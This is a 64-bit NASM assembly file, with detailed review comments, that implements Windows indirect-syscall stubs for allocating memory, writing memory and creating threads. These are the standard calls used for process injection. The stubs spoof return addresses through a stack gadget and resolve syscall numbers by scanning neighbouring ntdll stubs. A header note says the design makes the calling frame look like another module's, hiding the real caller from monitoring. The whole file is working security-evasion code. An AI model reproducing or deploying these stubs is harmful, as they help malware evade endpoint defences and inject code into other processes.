; Assembly.asm — NASM syntax, 64-bit.
; ABI assumptions visible in the code: Microsoft x64 (first four arguments in
; rcx/rdx/r8/r9, further arguments on the stack starting at [rsp+0x28]) and the
; Windows syscall convention (first argument copied to r10, number in rax).
;
; The two qwords below are code pointers filled in at runtime by the two
; Search_* routines and consumed by the three *_Callback stubs. They live in a
; writable section and are loaded through 64-bit absolute addresses, so the
; image depends on relocations rather than RIP-relative addressing.
;
; Detection note: each *_Callback stub never executes `syscall` itself — it
; jumps to whatever `syscall; ret` sequence the search found (presumably inside
; an ntdll stub; the start address comes from the caller in rax) and pushes the
; address of an `add rsp, 0x78; ret` sequence as the return address. At the
; syscall boundary the top frame therefore looks like the module that owns
; those bytes; the frame identifying the real caller is the one above it.
section .data
syscall_ret dq 0000000000000000h ; -> `syscall; ret`, written by Search_For_Syscall_Ret
add_rsp_ret dq 0000000000000000h ; -> `add rsp, 0x78; ret`, written by Search_For_Add_Rsp_Ret
section .text
; Exported entry points. GetSSNByFuncAddress takes its input in rcx (ABI
; conformant); both Search_* routines take their start address in rax, which
; is NOT an ABI argument register, so they cannot be called directly from C.
; Each *_Callback ignores rcx and reads an argument block pointed to by rdx.
global GetSSNByFuncAddress
global Search_For_Syscall_Ret
global Search_For_Add_Rsp_Ret
global NtAllocateVirtualMemory_Callback
global NtCreateThreadEx_Callback
global NtWriteVirtualMemory_Callback
;-----------------------------------------------------------------------
; NtAllocateVirtualMemory_Callback
; In:    rcx = ignored (overwritten before it is ever read)
;        rdx = pointer to an argument block:
;               +0x00 arg1  +0x08 arg2  +0x10 arg3  +0x18 arg4
;               +0x20 arg5  +0x24 arg6  +0x28 syscall number
; Out:   rax = result left in rax by the syscall; control returns to this
;        stub's caller via the add_rsp_ret gadget, never through a `ret` here
; Clobb: rbx, r15 (callee-saved under Microsoft x64, NOT preserved),
;        rcx, rdx, r8, r9, r10, r11 (syscall), rax, flags
; Stack: sub 0x78 plus one push; the `add rsp, 0x78; ret` gadget undoes both
;-----------------------------------------------------------------------
NtAllocateVirtualMemory_Callback:
sub rsp, 0x78                   ; entry rsp%16==8 -> 0 here; gadget adds it back
mov r15, add_rsp_ret
mov r15, [r15]                  ; r15 = address of `add rsp, 0x78; ret`
push r15                        ; fake return address: the `ret` after `syscall`
                                ; lands on the gadget, which returns to our caller
mov rbx, rdx                    ; rbx = argument block
mov rcx, [rbx]
mov rdx, [rbx + 0x8]
mov r8, [rbx + 0x10]
mov r9, [rbx + 0x18]
; NOTE(review): an 8-byte load at +0x24 overlaps the +0x28 slot (the syscall
; number lands in its upper half); this only works if arg6 is a 32-bit value
; whose upper bytes are ignored — confirm against the caller's struct layout.
mov r10, [rbx + 0x24]
mov [rsp+0x30], r10             ; arg6 -> second stack slot
mov r10, [rbx + 0x20]
mov [rsp+0x28], r10             ; arg5 -> first stack slot past the 32-byte home area
mov r10, rcx                    ; syscall convention: first argument in r10
mov r15, syscall_ret
mov r15, [r15]                  ; r15 = address of `syscall; ret`
mov rax, [rbx + 0x28]           ; rax = syscall number
jmp r15
;-----------------------------------------------------------------------
; NtWriteVirtualMemory_Callback
; In:    rcx = ignored (overwritten before it is ever read)
;        rdx = pointer to an argument block:
;               +0x00 arg1  +0x08 arg2  +0x10 arg3  +0x18 arg4
;               +0x20 arg5  +0x28 syscall number
; Out:   rax = result left in rax by the syscall; control returns to this
;        stub's caller via the add_rsp_ret gadget, never through a `ret` here
; Clobb: rbx, r15 (callee-saved under Microsoft x64, NOT preserved),
;        rcx, rdx, r8, r9, r10, r11 (syscall), rax, flags
; Stack: sub 0x78 plus one push; the `add rsp, 0x78; ret` gadget undoes both
; Same shape as NtAllocateVirtualMemory_Callback with one stack argument.
;-----------------------------------------------------------------------
NtWriteVirtualMemory_Callback:
sub rsp, 0x78                   ; entry rsp%16==8 -> 0 here; gadget adds it back
mov r15, add_rsp_ret
mov r15, [r15]                  ; r15 = address of `add rsp, 0x78; ret`
push r15                        ; fake return address for the `ret` after `syscall`
mov rbx, rdx                    ; rbx = argument block
mov rcx, [rbx]
mov rdx, [rbx + 0x8]
mov r8, [rbx + 0x10]
mov r9, [rbx + 0x18]
mov r10, [rbx + 0x20]
mov [rsp+0x28], r10             ; arg5 -> first stack slot past the 32-byte home area
mov r10, rcx                    ; syscall convention: first argument in r10
mov r15, syscall_ret
mov r15, [r15]                  ; r15 = address of `syscall; ret`
mov rax, [rbx + 0x28]           ; rax = syscall number
jmp r15
;-----------------------------------------------------------------------
; NtCreateThreadEx_Callback
; In:    rcx = ignored (overwritten before it is ever read)
;        rdx = pointer to an argument block:
;               +0x00 arg1  +0x08 arg2  +0x10 arg3  +0x18 arg4
;               +0x20 .. +0x50 arg5 .. arg11 (eight-byte slots)
;               +0x58 syscall number
; Out:   rax = result left in rax by the syscall; control returns to this
;        stub's caller via the add_rsp_ret gadget, never through a `ret` here
; Clobb: rbx, r15 (callee-saved under Microsoft x64, NOT preserved),
;        rcx, rdx, r8, r9, r10, r11 (syscall), rax, flags
; Stack: sub 0x78 plus one push; stack arguments occupy [rsp+0x28]..[rsp+0x58],
;        all inside the 0x78 frame; the `add rsp, 0x78; ret` gadget undoes it
; Same shape as NtAllocateVirtualMemory_Callback with seven stack arguments,
; copied highest slot first.
;-----------------------------------------------------------------------
NtCreateThreadEx_Callback:
sub rsp, 0x78                   ; entry rsp%16==8 -> 0 here; gadget adds it back
mov r15, add_rsp_ret
mov r15, [r15]                  ; r15 = address of `add rsp, 0x78; ret`
push r15                        ; fake return address for the `ret` after `syscall`
mov rbx, rdx                    ; rbx = argument block
mov rcx, [rbx]
mov rdx, [rbx + 0x8]
mov r8, [rbx + 0x10]
mov r9, [rbx + 0x18]
mov r10, [rbx + 0x50]
mov [rsp+0x58], r10             ; arg11
mov r10, [rbx + 0x48]
mov [rsp+0x50], r10             ; arg10
mov r10, [rbx + 0x40]
mov [rsp+0x48], r10             ; arg9
mov r10, [rbx + 0x38]
mov [rsp+0x40], r10             ; arg8
mov r10, [rbx + 0x30]
mov [rsp+0x38], r10             ; arg7
mov r10, [rbx + 0x28]
mov [rsp+0x30], r10             ; arg6
mov r10, [rbx + 0x20]
mov [rsp+0x28], r10             ; arg5 -> first stack slot past the 32-byte home area
mov r10, rcx                    ; syscall convention: first argument in r10
mov r15, syscall_ret
mov r15, [r15]                  ; r15 = address of `syscall; ret`
mov rax, [rbx + 0x58]           ; rax = syscall number
jmp r15
;-----------------------------------------------------------------------
; Search_For_Syscall_Ret
; In:    rax = start address (NOT an ABI argument register); scanning
;        begins at rax+1 and advances one byte per iteration
; Out:   [syscall_ret] = first address p > rax whose bytes p[5..7] are
;        C3 0F 1F (`ret` followed by the first two bytes of a multi-byte
;        nop). Bytes p[0..4] are masked out and never checked, so the
;        routine only assumes — it does not verify — that p itself holds
;        `syscall; ret` (0F 05 C3).
;        r15 = 0; rax unchanged
; Clobb: rbx, rdi, r15 (callee-saved under Microsoft x64, NOT preserved),
;        rcx, rdx, flags
; Termination: unbounded — the loop runs until a match or until the
;        unaligned 8-byte read at [rdx] faults on an unmapped page.
;-----------------------------------------------------------------------
Search_For_Syscall_Ret:
; Search for Syscall + Ret
mov rdx, rax                    ; 3-byte encoding (48 89 C2): `+ 3h` below targets the next line
add rdx, 1                      ; loop head: advance one byte
xor rbx, rbx
xor rcx, rcx                    ; redundant: the next mov fully overwrites rcx
mov rcx, 00FFFFFF0000000000h    ; mask selecting bytes 5..7 of the qword at [rdx]
mov rdi, [rdx]                  ; unaligned 8-byte read of code bytes
and rdi, rcx
or rbx, rdi                     ; rbx == rdi here (rbx was zero)
shr rbx, 28h                    ; bring bytes 5..7 down to bits 0..23
cmp rbx, 1F0FC3h                ; little-endian: [rdx+5]=C3 [rdx+6]=0F [rdx+7]=1F
jne Search_For_Syscall_Ret + 3h ; no match: back to `add rdx, 1`
mov r15, syscall_ret
mov [r15], rdx                  ; publish the match for the *_Callback stubs
xor r15, r15
ret
;-----------------------------------------------------------------------
; Search_For_Add_Rsp_Ret
; In:    rax = start address (NOT an ABI argument register); scanning
;        begins at rax+1 and advances one byte per iteration
; Out:   [add_rsp_ret] = first address p > rax whose bytes p[0..4] are
;        48 83 C4 78 C3 (`add rsp, 0x78; ret`); rax unchanged.
;        Unlike Search_For_Syscall_Ret, r15 is left holding the address
;        of add_rsp_ret rather than being zeroed.
; Clobb: rbx, rdi, r14, r15 (callee-saved under Microsoft x64, NOT
;        preserved), rcx, rdx, flags
; Termination: unbounded — the loop runs until a match or until the
;        unaligned 8-byte read at [rdx] faults on an unmapped page.
;-----------------------------------------------------------------------
Search_For_Add_Rsp_Ret:
; Search for add rsp, 78 + Ret
mov rdx, rax                    ; 3-byte encoding (48 89 C2): `+ 3h` below targets the next line
add rdx, 1                      ; loop head: advance one byte
xor rbx, rbx
xor rcx, rcx                    ; redundant: the next mov fully overwrites rcx
mov rcx, 0000FFFFFFFFFFh        ; mask selecting the low 5 bytes of the qword at [rdx]
mov rdi, [rdx]                  ; unaligned 8-byte read of code bytes
and rdi, rcx
or rbx, rdi                     ; rbx == rdi here (rbx was zero)
mov r14, 00C378C48348h          ; little-endian 48 83 C4 78 C3 = `add rsp, 0x78` `ret`
cmp rbx, r14
jne Search_For_Add_Rsp_Ret + 3h ; no match: back to `add rdx, 1`
mov r15, add_rsp_ret
mov [r15], rdx                  ; publish the match for the *_Callback stubs
ret
;-----------------------------------------------------------------------
; GetSSNByFuncAddress
; In:    rcx = address to start from (first ABI argument)
; Out:   rax = the 8 bytes at p+4 minus the step count, where p is the
;        first of rcx, rcx+0x20, rcx+0x40, ... whose leading four bytes are
;        4C 8B D1 B8 (`mov r10, rcx` followed by the opcode of
;        `mov eax, imm32`) and the step count is how many 0x20-byte slots
;        were skipped to reach p. The load is 8 bytes wide, so bits 32..63
;        of rax hold the four bytes that follow the immediate — presumably
;        the caller truncates to eax; verify at the call site.
;        The subtraction suggests consecutive slots are expected to carry
;        consecutive numbers — that assumption is not checked here.
; Clobb: rbx (callee-saved under Microsoft x64, NOT preserved), rcx, rdx, flags
; Termination: unbounded — steps forward 0x20 bytes at a time until a
;        match or a faulting read.
; Offsets: the `+ 0xA` / `+ 0x1B` targets assume `mov ebx, imm32` is 5 bytes
;        and `mov rdx, 0x0` assembles to the 5-byte `mov edx, imm32` form
;        (NASM's optimizer does this); with a 7-byte `48 C7 C2` encoding the
;        jumps would land mid-instruction.
;-----------------------------------------------------------------------
GetSSNByFuncAddress:
mov ebx, 0xB8D18B4C             ; little-endian 4C 8B D1 B8 = `mov r10, rcx` + `mov eax,` opcode
mov rdx, 0x0                    ; rdx = number of 0x20-byte slots skipped
mov rax, [rcx]                  ; loop head (`+ 0xA` target)
cmp eax, ebx
je GetSSNByFuncAddress + 0x1B   ; match: jump to `mov rax, [rcx + 0x4]` below
add rcx, 0x20                   ; no match: next 0x20-byte slot
add rdx, 0x1
jmp GetSSNByFuncAddress + 0xA   ; back to `mov rax, [rcx]`
mov rax, [rcx + 0x4]            ; rax = imm32 of `mov eax, imm32` (+ 4 trailing bytes in the upper half)
sub rax, rdx                    ; compensate for the slots skipped (see header)
ret